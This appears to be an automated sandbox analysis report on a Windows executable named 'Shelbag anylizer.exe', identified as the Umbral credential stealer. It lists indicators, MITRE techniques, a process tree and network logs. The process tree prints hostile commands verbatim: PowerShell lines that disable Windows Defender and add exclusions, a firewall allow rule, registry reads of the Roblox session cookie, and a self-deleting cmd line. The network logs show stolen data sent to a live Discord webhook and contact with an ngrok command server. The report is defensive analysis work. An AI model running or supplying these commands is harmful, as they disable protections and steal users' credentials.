umbral | bdcfadcd70c3f7257a4b76181146424698309059fa089a6d7a83a76ea063c601

Analysis

max time kernel
150s
max time network
157s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
14/05/2024, 19:13 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Shelbag anylizer.exe
Size

93KB
MD5

1ead93be70fe9a5c810e495eb7a03fda
SHA1

cc23e50346278e4e43cd555cef0f2717bb6b888a
SHA256

bdcfadcd70c3f7257a4b76181146424698309059fa089a6d7a83a76ea063c601
SHA512

76828126e5994e01e31a027fa86a5d87aa0f278e6799e54fdf4f9429a746406621e4db6e57aac3d8421fa046efe66e089e35ea44ea516f2a20fce827dba12fbb
SSDEEP

768:NY3KkgyYtrF4M5Y2XaxKlwnvhDL95XpJCTXTfGBqXxrjEtCdnl2pi1Rz4Rk38sGt:NkZYZpXajhLff2TfRjEwzGi1dDUDRgS

Score

10^/10

umbral evasion execution spyware stealer

Malware Config

Signatures

Detect Umbral payload 2 IoCs

resource	yara_rule
behavioral2/files/0x00080000000233d9-34.dat	family_umbral
behavioral2/memory/3828-41-0x0000026A533E0000-0x0000026A53420000-memory.dmp	family_umbral

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
4460	powershell.exe

Disables Task Manager via registry modification
evasion

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	tmp397A.tmp.exe

Modifies Windows Firewall 2 TTPs 1 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
4044	netsh.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation	Shelbag anylizer.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation	server.exe

Drops startup file 4 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\system.exe	server.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\system.exe	server.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\5ebdc7b19669104b071decf7763dfb48Windows Update.exe	server.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\5ebdc7b19669104b071decf7763dfb48Windows Update.exe	server.exe

Executes dropped EXE 2 IoCs

pid	Process
1732	server.exe
3828	tmp397A.tmp.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
14	0.tcp.eu.ngrok.io
43	discord.com
44	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
34	ip-api.com

Drops file in System32 directory 2 IoCs

description	ioc	Process
File created	C:\Windows\SysWOW64\Explower.exe	server.exe
File opened for modification	C:\Windows\SysWOW64\Explower.exe	server.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
4620	wmic.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
1484	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1732	server.exe
1732	server.exe
1732	server.exe
1732	server.exe
1732	server.exe
1732	server.exe
1732	server.exe
1732	server.exe
1732	server.exe
1732	server.exe
1732	server.exe
1732	server.exe
1732	server.exe
1732	server.exe
1732	server.exe
1732	server.exe
1732	server.exe
1732	server.exe
1732	server.exe
1732	server.exe
1732	server.exe
1732	server.exe
1732	server.exe
1732	server.exe
1732	server.exe
1732	server.exe
1732	server.exe
1732	server.exe
1732	server.exe
1732	server.exe
1732	server.exe
1732	server.exe
1732	server.exe
1732	server.exe
1732	server.exe
1732	server.exe
1732	server.exe
1732	server.exe
1732	server.exe
1732	server.exe
1732	server.exe
1732	server.exe
1732	server.exe
1732	server.exe
1732	server.exe
1732	server.exe
1732	server.exe
1732	server.exe
1732	server.exe
1732	server.exe
1732	server.exe
1732	server.exe
1732	server.exe
1732	server.exe
1732	server.exe
1732	server.exe
1732	server.exe
1732	server.exe
1732	server.exe
1732	server.exe
1732	server.exe
1732	server.exe
1732	server.exe
1732	server.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
1732	server.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1732	server.exe
Token: 33	1732	server.exe
Token: SeIncBasePriorityPrivilege	1732	server.exe
Token: 33	1732	server.exe
Token: SeIncBasePriorityPrivilege	1732	server.exe
Token: 33	1732	server.exe
Token: SeIncBasePriorityPrivilege	1732	server.exe
Token: 33	1732	server.exe
Token: SeIncBasePriorityPrivilege	1732	server.exe
Token: 33	1732	server.exe
Token: SeIncBasePriorityPrivilege	1732	server.exe
Token: 33	1732	server.exe
Token: SeIncBasePriorityPrivilege	1732	server.exe
Token: SeDebugPrivilege	3828	tmp397A.tmp.exe
Token: SeIncreaseQuotaPrivilege	2064	wmic.exe
Token: SeSecurityPrivilege	2064	wmic.exe
Token: SeTakeOwnershipPrivilege	2064	wmic.exe
Token: SeLoadDriverPrivilege	2064	wmic.exe
Token: SeSystemProfilePrivilege	2064	wmic.exe
Token: SeSystemtimePrivilege	2064	wmic.exe
Token: SeProfSingleProcessPrivilege	2064	wmic.exe
Token: SeIncBasePriorityPrivilege	2064	wmic.exe
Token: SeCreatePagefilePrivilege	2064	wmic.exe
Token: SeBackupPrivilege	2064	wmic.exe
Token: SeRestorePrivilege	2064	wmic.exe
Token: SeShutdownPrivilege	2064	wmic.exe
Token: SeDebugPrivilege	2064	wmic.exe
Token: SeSystemEnvironmentPrivilege	2064	wmic.exe
Token: SeRemoteShutdownPrivilege	2064	wmic.exe
Token: SeUndockPrivilege	2064	wmic.exe
Token: SeManageVolumePrivilege	2064	wmic.exe
Token: 33	2064	wmic.exe
Token: 34	2064	wmic.exe
Token: 35	2064	wmic.exe
Token: 36	2064	wmic.exe
Token: SeIncreaseQuotaPrivilege	2064	wmic.exe
Token: SeSecurityPrivilege	2064	wmic.exe
Token: SeTakeOwnershipPrivilege	2064	wmic.exe
Token: SeLoadDriverPrivilege	2064	wmic.exe
Token: SeSystemProfilePrivilege	2064	wmic.exe
Token: SeSystemtimePrivilege	2064	wmic.exe
Token: SeProfSingleProcessPrivilege	2064	wmic.exe
Token: SeIncBasePriorityPrivilege	2064	wmic.exe
Token: SeCreatePagefilePrivilege	2064	wmic.exe
Token: SeBackupPrivilege	2064	wmic.exe
Token: SeRestorePrivilege	2064	wmic.exe
Token: SeShutdownPrivilege	2064	wmic.exe
Token: SeDebugPrivilege	2064	wmic.exe
Token: SeSystemEnvironmentPrivilege	2064	wmic.exe
Token: SeRemoteShutdownPrivilege	2064	wmic.exe
Token: SeUndockPrivilege	2064	wmic.exe
Token: SeManageVolumePrivilege	2064	wmic.exe
Token: 33	2064	wmic.exe
Token: 34	2064	wmic.exe
Token: 35	2064	wmic.exe
Token: 36	2064	wmic.exe
Token: SeDebugPrivilege	4460	powershell.exe
Token: SeDebugPrivilege	2848	powershell.exe
Token: SeDebugPrivilege	2392	powershell.exe
Token: SeDebugPrivilege	1568	powershell.exe
Token: SeIncreaseQuotaPrivilege	4388	wmic.exe
Token: SeSecurityPrivilege	4388	wmic.exe
Token: SeTakeOwnershipPrivilege	4388	wmic.exe
Token: SeLoadDriverPrivilege	4388	wmic.exe

Suspicious use of FindShellTrayWindow 3 IoCs

pid	Process
1732	server.exe
1732	server.exe
1732	server.exe

Suspicious use of WriteProcessMemory 34 IoCs

description	pid	Process	procid_target
PID 4944 wrote to memory of 1732	4944	Shelbag anylizer.exe	81
PID 4944 wrote to memory of 1732	4944	Shelbag anylizer.exe	81
PID 4944 wrote to memory of 1732	4944	Shelbag anylizer.exe	81
PID 1732 wrote to memory of 4044	1732	server.exe	82
PID 1732 wrote to memory of 4044	1732	server.exe	82
PID 1732 wrote to memory of 4044	1732	server.exe	82
PID 1732 wrote to memory of 3828	1732	server.exe	87
PID 1732 wrote to memory of 3828	1732	server.exe	87
PID 3828 wrote to memory of 2064	3828	tmp397A.tmp.exe	88
PID 3828 wrote to memory of 2064	3828	tmp397A.tmp.exe	88
PID 3828 wrote to memory of 3164	3828	tmp397A.tmp.exe	90
PID 3828 wrote to memory of 3164	3828	tmp397A.tmp.exe	90
PID 3828 wrote to memory of 4460	3828	tmp397A.tmp.exe	92
PID 3828 wrote to memory of 4460	3828	tmp397A.tmp.exe	92
PID 3828 wrote to memory of 2848	3828	tmp397A.tmp.exe	94
PID 3828 wrote to memory of 2848	3828	tmp397A.tmp.exe	94
PID 3828 wrote to memory of 2392	3828	tmp397A.tmp.exe	96
PID 3828 wrote to memory of 2392	3828	tmp397A.tmp.exe	96
PID 3828 wrote to memory of 1568	3828	tmp397A.tmp.exe	98
PID 3828 wrote to memory of 1568	3828	tmp397A.tmp.exe	98
PID 3828 wrote to memory of 4388	3828	tmp397A.tmp.exe	101
PID 3828 wrote to memory of 4388	3828	tmp397A.tmp.exe	101
PID 3828 wrote to memory of 1492	3828	tmp397A.tmp.exe	103
PID 3828 wrote to memory of 1492	3828	tmp397A.tmp.exe	103
PID 3828 wrote to memory of 2368	3828	tmp397A.tmp.exe	105
PID 3828 wrote to memory of 2368	3828	tmp397A.tmp.exe	105
PID 3828 wrote to memory of 4068	3828	tmp397A.tmp.exe	107
PID 3828 wrote to memory of 4068	3828	tmp397A.tmp.exe	107
PID 3828 wrote to memory of 4620	3828	tmp397A.tmp.exe	109
PID 3828 wrote to memory of 4620	3828	tmp397A.tmp.exe	109
PID 3828 wrote to memory of 1344	3828	tmp397A.tmp.exe	111
PID 3828 wrote to memory of 1344	3828	tmp397A.tmp.exe	111
PID 1344 wrote to memory of 1484	1344	cmd.exe	113
PID 1344 wrote to memory of 1484	1344	cmd.exe	113

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
3164	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Shelbag anylizer.exe
"C:\Users\Admin\AppData\Local\Temp\Shelbag anylizer.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4944
- C:\Users\Admin\AppData\Roaming\server.exe
  "C:\Users\Admin\AppData\Roaming\server.exe"
  2⤵
  - Checks computer location settings
  - Drops startup file
  - Executes dropped EXE
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of WriteProcessMemory
  PID:1732
- - C:\Windows\SysWOW64\netsh.exe
    netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\server.exe" "server.exe" ENABLE
    3⤵
    - Modifies Windows Firewall
    PID:4044
- - C:\Users\Admin\AppData\Local\Temp\tmp397A.tmp.exe
    "C:\Users\Admin\AppData\Local\Temp\tmp397A.tmp.exe"
    3⤵
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3828
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" csproduct get uuid
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2064
  - - C:\Windows\SYSTEM32\attrib.exe
      "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\tmp397A.tmp.exe"
      4⤵
      Views/modifies file attributes
      PID:3164
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\tmp397A.tmp.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious use of AdjustPrivilegeToken
      PID:4460
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2848
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2392
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1568
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" os get Caption
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4388
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" computersystem get totalphysicalmemory
      4⤵
      PID:1492
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" csproduct get uuid
      4⤵
      PID:2368
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      PID:4068
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic" path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:4620
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\tmp397A.tmp.exe" && pause
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1344
    - - C:\Windows\system32\PING.EXE
        
        ping localhost
        5⤵
        Runs ping.exe
        
        PID:1484

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
PID:3292

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
PID:3976

Network

DNS

5.181.190.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

5.181.190.20.in-addr.arpa

IN PTR

Response
DNS

95.221.229.192.in-addr.arpa

Remote address:

8.8.8.8:53

Request

95.221.229.192.in-addr.arpa

IN PTR

Response
DNS

203.197.79.204.in-addr.arpa

Remote address:

8.8.8.8:53

Request

203.197.79.204.in-addr.arpa

IN PTR

Response

203.197.79.204.in-addr.arpa

IN PTR

a-0003a-msedgenet
DNS

240.221.184.93.in-addr.arpa

Remote address:

8.8.8.8:53

Request

240.221.184.93.in-addr.arpa

IN PTR

Response
DNS

0.tcp.eu.ngrok.io

server.exe

Remote address:

8.8.8.8:53

Request

0.tcp.eu.ngrok.io

IN A

Response

0.tcp.eu.ngrok.io

IN A

18.192.31.165
DNS

165.31.192.18.in-addr.arpa

Remote address:

8.8.8.8:53

Request

165.31.192.18.in-addr.arpa

IN PTR

Response

165.31.192.18.in-addr.arpa

IN PTR

ec2-18-192-31-165eu-central-1compute amazonawscom
DNS

103.169.127.40.in-addr.arpa

Remote address:

8.8.8.8:53

Request

103.169.127.40.in-addr.arpa

IN PTR

Response
DNS

18.31.95.13.in-addr.arpa

Remote address:

8.8.8.8:53

Request

18.31.95.13.in-addr.arpa

IN PTR

Response
DNS

3.166.122.92.in-addr.arpa

Remote address:

8.8.8.8:53

Request

3.166.122.92.in-addr.arpa

IN PTR

Response

3.166.122.92.in-addr.arpa

IN PTR

a92-122-166-3deploystaticakamaitechnologiescom
DNS

gstatic.com

tmp397A.tmp.exe

Remote address:

8.8.8.8:53

Request

gstatic.com

IN A

Response

gstatic.com

IN A

142.250.75.227
GET

https://gstatic.com/generate_204

tmp397A.tmp.exe

Remote address:

142.250.75.227:443

Request

GET /generate_204 HTTP/1.1
Host: gstatic.com
Connection: Keep-Alive

Response

HTTP/1.1 204 No Content

Content-Length: 0
Cross-Origin-Resource-Policy: cross-origin
Date: Tue, 14 May 2024 19:14:31 GMT
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
DNS

ip-api.com

tmp397A.tmp.exe

Remote address:

8.8.8.8:53

Request

ip-api.com

IN A

Response

ip-api.com

IN A

208.95.112.1
GET

http://ip-api.com/line/?fields=hosting

tmp397A.tmp.exe

Remote address:

208.95.112.1:80

Request

GET /line/?fields=hosting HTTP/1.1
Host: ip-api.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Tue, 14 May 2024 19:14:32 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 6
Access-Control-Allow-Origin: *
X-Ttl: 60
X-Rl: 44
DNS

227.75.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

227.75.250.142.in-addr.arpa

IN PTR

Response

227.75.250.142.in-addr.arpa

IN PTR

par10s41-in-f31e100net
DNS

1.112.95.208.in-addr.arpa

Remote address:

8.8.8.8:53

Request

1.112.95.208.in-addr.arpa

IN PTR

Response

1.112.95.208.in-addr.arpa

IN PTR

ip-apicom
GET

http://ip-api.com/json/?fields=225545

tmp397A.tmp.exe

Remote address:

208.95.112.1:80

Request

GET /json/?fields=225545 HTTP/1.1
Host: ip-api.com

Response

HTTP/1.1 200 OK

Date: Tue, 14 May 2024 19:14:35 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 163
Access-Control-Allow-Origin: *
X-Ttl: 56
X-Rl: 43
DNS

79.190.18.2.in-addr.arpa

Remote address:

8.8.8.8:53

Request

79.190.18.2.in-addr.arpa

IN PTR

Response

79.190.18.2.in-addr.arpa

IN PTR

a2-18-190-79deploystaticakamaitechnologiescom
DNS

discord.com

tmp397A.tmp.exe

Remote address:

8.8.8.8:53

Request

discord.com

IN A

Response

discord.com

IN A

162.159.136.232

discord.com

IN A

162.159.128.233

discord.com

IN A

162.159.138.232

discord.com

IN A

162.159.135.232

discord.com

IN A

162.159.137.232
POST

https://discord.com/api/webhooks/1227762500397957251/dhx837yEVk8TXKU5bvJVlgCsA8i_NvgSQGewCTKL2ilj0l-2oZcrxFTGCGQRtFflB5mA

tmp397A.tmp.exe

Remote address:

162.159.136.232:443

Request

POST /api/webhooks/1227762500397957251/dhx837yEVk8TXKU5bvJVlgCsA8i_NvgSQGewCTKL2ilj0l-2oZcrxFTGCGQRtFflB5mA HTTP/1.1
Accept: application/json
User-Agent: Opera/9.80 (Windows NT 6.1; YB/4.0.0) Presto/2.12.388 Version/12.17
Content-Type: application/json; charset=utf-8
Host: discord.com
Content-Length: 941
Expect: 100-continue
Connection: Keep-Alive

Response

HTTP/1.1 204 No Content

Date: Tue, 14 May 2024 19:14:37 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
set-cookie: __dcfduid=34a498c4122611efb4c162857f0d9d27; Expires=Sun, 13-May-2029 19:14:37 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
x-ratelimit-limit: 5
x-ratelimit-remaining: 4
x-ratelimit-reset: 1715714078
x-ratelimit-reset-after: 1
via: 1.1 google
alt-svc: h3=":443"; ma=86400
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2SJAB4sw2nywV6zoVhN9ZNPIAE6xgvBNbN5Uc2TiCFvAMC4nekcBNW1x8RcNIo%2B85Zq%2BT%2BaP9A3IM5ab5aNr3VyegUFCCLIt2B16ArJYlP0tyyE1qukogA6MlxlK"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
Set-Cookie: __sdcfduid=34a498c4122611efb4c162857f0d9d27b824b85e37365a24e65c94858b7cde2d3bf0e2c8b880b2f3d88bd91f98099f81; Expires=Sun, 13-May-2029 19:14:37 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
Set-Cookie: __cfruid=5fac08b8dce6e80c9886c45c3540377c35f53c20-1715714077; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Set-Cookie: _cfuvid=dggvCyZ1z6.iH2uNUoPSyIDrN4_KCcyWD0MqCnS1xVE-1715714077350-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 883d36557d5adc87-LHR
POST

https://discord.com/api/webhooks/1227762500397957251/dhx837yEVk8TXKU5bvJVlgCsA8i_NvgSQGewCTKL2ilj0l-2oZcrxFTGCGQRtFflB5mA

tmp397A.tmp.exe

Remote address:

162.159.136.232:443

Request

POST /api/webhooks/1227762500397957251/dhx837yEVk8TXKU5bvJVlgCsA8i_NvgSQGewCTKL2ilj0l-2oZcrxFTGCGQRtFflB5mA HTTP/1.1
Accept: application/json
User-Agent: Opera/9.80 (Windows NT 6.1; YB/4.0.0) Presto/2.12.388 Version/12.17
Content-Type: multipart/form-data; boundary="51ef1a60-473b-4f7e-b02e-de6557be8c91"
Host: discord.com
Cookie: __dcfduid=34a498c4122611efb4c162857f0d9d27; __sdcfduid=34a498c4122611efb4c162857f0d9d27b824b85e37365a24e65c94858b7cde2d3bf0e2c8b880b2f3d88bd91f98099f81; __cfruid=5fac08b8dce6e80c9886c45c3540377c35f53c20-1715714077; _cfuvid=dggvCyZ1z6.iH2uNUoPSyIDrN4_KCcyWD0MqCnS1xVE-1715714077350-0.0.1.1-604800000
Content-Length: 427091
Expect: 100-continue

Response

HTTP/1.1 200 OK

Date: Tue, 14 May 2024 19:14:38 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
x-ratelimit-limit: 5
x-ratelimit-remaining: 4
x-ratelimit-reset: 1715714079
x-ratelimit-reset-after: 1
vary: Accept-Encoding
via: 1.1 google
alt-svc: h3=":443"; ma=86400
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ciSf1q5KN0BwUsgQUKedtaAbRgDMmZ2xDA4T%2FLjcg7CES1cRBZieFFDZuFh%2BCuGyS3nO6mwZaCIjtVXPpYBNjehENHO4nQgc6lHrassR7vsk7iALcLOqmw2ZV1Ny"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
Server: cloudflare
CF-RAY: 883d3657a959dc87-LHR
DNS

232.136.159.162.in-addr.arpa

Remote address:

8.8.8.8:53

Request

232.136.159.162.in-addr.arpa

IN PTR

Response
DNS

14.227.111.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

14.227.111.52.in-addr.arpa

IN PTR

Response

18.192.31.165:12272

0.tcp.eu.ngrok.io

server.exe

4.6kB
131.7kB
78
135
18.192.31.165:12272

0.tcp.eu.ngrok.io

server.exe

106.7kB
3.7kB
102
92
142.250.75.227:443

https://gstatic.com/generate_204

tls, http

tmp397A.tmp.exe

822 B
5.1kB
10
9

HTTP Request

GET https://gstatic.com/generate_204

HTTP Response

204
208.95.112.1:80

http://ip-api.com/line/?fields=hosting

http

tmp397A.tmp.exe

310 B
267 B
5
2

HTTP Request

GET http://ip-api.com/line/?fields=hosting

HTTP Response

200
208.95.112.1:80

http://ip-api.com/json/?fields=225545

http

tmp397A.tmp.exe

285 B
472 B
5
3

HTTP Request

GET http://ip-api.com/json/?fields=225545

HTTP Response

200
162.159.136.232:443

https://discord.com/api/webhooks/1227762500397957251/dhx837yEVk8TXKU5bvJVlgCsA8i_NvgSQGewCTKL2ilj0l-2oZcrxFTGCGQRtFflB5mA

tls, http

tmp397A.tmp.exe

477.1kB
11.6kB
354
119

HTTP Request

POST https://discord.com/api/webhooks/1227762500397957251/dhx837yEVk8TXKU5bvJVlgCsA8i_NvgSQGewCTKL2ilj0l-2oZcrxFTGCGQRtFflB5mA

HTTP Response

204

HTTP Request

POST https://discord.com/api/webhooks/1227762500397957251/dhx837yEVk8TXKU5bvJVlgCsA8i_NvgSQGewCTKL2ilj0l-2oZcrxFTGCGQRtFflB5mA

HTTP Response

200

8.8.8.8:53

5.181.190.20.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

5.181.190.20.in-addr.arpa
8.8.8.8:53

95.221.229.192.in-addr.arpa

dns

73 B
144 B
1
1

DNS Request

95.221.229.192.in-addr.arpa
8.8.8.8:53

203.197.79.204.in-addr.arpa

dns

73 B
106 B
1
1

DNS Request

203.197.79.204.in-addr.arpa
8.8.8.8:53

240.221.184.93.in-addr.arpa

dns

73 B
144 B
1
1

DNS Request

240.221.184.93.in-addr.arpa
8.8.8.8:53

0.tcp.eu.ngrok.io

dns

server.exe

63 B
79 B
1
1

DNS Request

0.tcp.eu.ngrok.io

DNS Response

18.192.31.165
8.8.8.8:53

165.31.192.18.in-addr.arpa

dns

72 B
138 B
1
1

DNS Request

165.31.192.18.in-addr.arpa
8.8.8.8:53

103.169.127.40.in-addr.arpa

dns

73 B
147 B
1
1

DNS Request

103.169.127.40.in-addr.arpa
8.8.8.8:53

18.31.95.13.in-addr.arpa

dns

70 B
144 B
1
1

DNS Request

18.31.95.13.in-addr.arpa
8.8.8.8:53

3.166.122.92.in-addr.arpa

dns

71 B
135 B
1
1

DNS Request

3.166.122.92.in-addr.arpa
8.8.8.8:53

gstatic.com

dns

tmp397A.tmp.exe

57 B
73 B
1
1

DNS Request

gstatic.com

DNS Response

142.250.75.227
8.8.8.8:53

ip-api.com

dns

tmp397A.tmp.exe

56 B
72 B
1
1

DNS Request

ip-api.com

DNS Response

208.95.112.1
8.8.8.8:53

227.75.250.142.in-addr.arpa

dns

73 B
111 B
1
1

DNS Request

227.75.250.142.in-addr.arpa
8.8.8.8:53

1.112.95.208.in-addr.arpa

dns

71 B
95 B
1
1

DNS Request

1.112.95.208.in-addr.arpa
8.8.8.8:53

79.190.18.2.in-addr.arpa

dns

70 B
133 B
1
1

DNS Request

79.190.18.2.in-addr.arpa
8.8.8.8:53

discord.com

dns

tmp397A.tmp.exe

57 B
137 B
1
1

DNS Request

discord.com

DNS Response

162.159.136.232

162.159.128.233

162.159.138.232

162.159.135.232

162.159.137.232
8.8.8.8:53

232.136.159.162.in-addr.arpa

dns

74 B
136 B
1
1

DNS Request

232.136.159.162.in-addr.arpa
8.8.8.8:53

14.227.111.52.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

14.227.111.52.in-addr.arpa

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
276798eeb29a49dc6e199768bc9c2e71

SHA1
5fdc8ccb897ac2df7476fbb07517aca5b7a6205b

SHA256
cd0a1056e8f1b6cb5cb328532239d802f4e2aa8f8fcdc0fcb487684bd68e0dcc

SHA512
0d34fce64bbefc57d64fa6e03ca886952263d5f24df9c1c4cce6a1e8f5a47a9a21e9820f8d38caa7f7b43a52336ce00b738ea18419aaa7c788b72e04ce19e4f2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
42a3371c158c084274bcac1936ac12b9

SHA1
6546651385520affc9708114cb8341a84d2b1a37

SHA256
194e06cc86ef254e19e302090e956c65302b1c48c2bb2404c15d5f32537418e5

SHA512
